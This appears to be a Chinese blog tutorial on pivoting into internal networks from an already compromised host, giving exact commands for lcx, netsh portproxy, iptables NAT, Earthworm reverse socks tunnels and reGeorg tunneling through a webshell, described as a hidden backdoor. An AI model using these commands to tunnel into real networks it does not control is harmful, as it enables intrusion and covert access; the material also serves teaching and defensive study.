天天看點

内網滲透-内網穿透工具内網穿透端口複用小結

作者:小剛

一位苦于資訊安全的萌新小白帽,記得關注給個贊,謝謝

本實驗僅用于資訊防禦教學,切勿用于其它用途

内網穿透

  • 内網穿透
    • lcx
    • netsh
    • iptables
    • Earthworm
  • 端口複用
    • reGeorg
  • 小結

内網穿透

想從外網滲透内網主機,但内網很多主機不直接連外網,是以要進行搭建通道

(前提是已經控制了一台主機,通過這台主機滲透其他内網主機)

win端口轉發:lcx.exe netsh

linux端口轉發:portmap iptables

多平台:Earthworm

端口複用:reGeorg

lcx

win平台的一款老工具。

(好用是好用,就是被放進全家桶了)

//端口轉發(listen和slave)
lcx.exe -listen 8080 8081 //監聽兩個端口
lcx.exe -slave 192.168.1.128 8080 192.168.1.131 8888 //連接配接128:8080端口時映射到131:8888端口
           
//端口映射(tran)
lcx -tran 8888 127.0.0.1 3306 //把8088端口映射到3306端口
           

netsh

win平台内置的指令

運作cmd

//xp需要安裝ipv6
netsh interface ipv6 install 
           

開啟防火牆需要放行tcp端口

//設定一個規則v4tov4,通路192.168.1.132:6666端口會轉發到192.168.1.128:3389端口
netsh interface portproxy set v4tov4 listenaddress=192.168.1.132 listenport=6666 connectaddress=192.168.1.128 connectport=3389
           

取消端口轉發

netsh interface portproxy delete v4tov4 listenaddress=192.168.1.132 listenport=3389
           

檢視已有配置

netsh interface portproxy show v4tov4
netsh interface portproxy show all
           

iptables

linux的端口轉發

開啟核心轉發

echo 1 > /proc/sys/net/ipv4/ip_forward
sysctl -p
           

配置端口轉發

//正向代理
//通路192.168.1.131:8888跳轉到192.168.1.128:80

iptables -t nat -A PREROUTING --dst 192.168.1.131 -p tcp --dport 8888 -j DNAT --to-destination 192.168.1.128:80
iptables -t nat -A POSTROUTING --dst 192.168.1.128 -p tcp --dport 80 -j SNAT --to-source 192.168.1.131
service iptables save && service iptables start //儲存重新開機
           
iptables -t nat -A PREROUTING -p tcp -m tcp --dport 8888 -j DNAT --to-destination 192.168.1.128:80
iptables -t nat -A POSTROUTING -s 192.168.0.0/16 -d 192.168.1.128 -p tcp -m tcp --dport 80 -j SNAT --to-source 192.168.1.131
           
//本機之間端口轉發
iptables -t nat -A PREROUTING -p tcp --dport 8888 -j REDIRECT --to-ports 3389
service iptables save && service iptables start //儲存重新開機
           

Earthworm

代理和端口轉發一身的多平台工具(win,linux,mac之間來回穿透)

//正向連接配接
ew_win32.exe -s ssocksd -l 8082 //直接變成socks5代理伺服器
           
//反向連接配接
ew_win32.exe -s rcsocks -l 8081 -e 8082 //監聽本機8082端口,等待内網主機連接配接,通路本機8081就能連結内網
ew_win32.exe -s rssocks -d 192.168.1.1 -e 8082 //内網主機轉發到外網8082端口
           

端口複用

一個端口運作多個應用

(适用于伺服器隻開放了80端口,就湊合一下一起從80端口進出資料)

(有很好的隐藏後門,不用再開通個端口)

reGeorg

Python2.7寫的一款工具,結合Webshell從80端口進行傳輸。

支援多種語言

https://github.com/sensepost/reGeorg

python2 reGeorgSocksProxy.py -l <監聽位址> -p <本地服務監聽的端口> -u <Webshell位址>
python2 reGeorgSocksProxy.py -l 192.168.1.131 -p 9999 -u http://192.168.1.128/tunnel.nosocket.php
           

小結

搭建好以後,就可以通過浏覽器添加代理,或用socks5工具等等配置全局代理啥的。

擷取工具

可關注微信公衆号:XG小剛

回複:内網穿透工具

内網滲透-内網穿透工具内網穿透端口複用小結